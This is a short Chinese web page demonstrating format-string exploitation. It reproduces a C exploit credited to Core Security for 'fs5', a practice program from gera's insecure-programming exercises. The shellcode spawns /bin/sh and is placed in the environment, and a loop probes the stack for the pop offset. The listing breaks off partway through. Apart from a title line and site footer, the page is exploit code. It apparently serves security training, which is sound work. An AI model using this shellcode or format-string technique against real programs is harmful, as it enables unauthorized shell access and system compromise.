非安全编程演示之格式化字符串(2)
2006-04-02 20:26:42 来源:WEB开发网
演示exploit如下:
/*
** exp_fs5.c
** Coded by Core Security - info@core-sec.com
*/
#include <string.h>
#include <stdio.h>
#include <unistd.h>
#define OBJDUMP "/usr/bin/objdump"
#define VICTIM "/home/user/gera/fs5"
#define GREP "/bin/grep"
/* 24 bytes shellcode */
char shellcode[]=
"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69"
"\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80";
int main() {
char evil_buffer[256], temp_buffer[256];
char *env[3] = {shellcode, NULL};
char *p;
int deregister_address, first_half, second_half, i;
FILE *f;
int ret = 0xbffffffa - strlen(shellcode) -
strlen("/home/user/gera/fs5");
bzero(evil_buffer, sizeof(evil_buffer));
sprintf(evil_buffer, "%s AAAA", VICTIM);
/* Finding stack pop */
printf("\nReading stack frames...\n");
for(i = 0; i < 30; i ++) {
strcat(evil_buffer, "%08x");
f = popen(evil_buffer, "r");
fscanf(f, "%s", temp_buffer);
p = temp_buffer + (4 + i*8);
printf("frame %.2d --> %s\n", (i + 1), p);
if(!strcmp(p, "41414141")) {
printf("\nExact match found. Stack pop is:
%d\n\n", i + 1);
pclose(f);
break;
}
pclose(f);
bzero(temp_buffer, sizeof(temp_buffer));
}
更多精彩
赞助商链接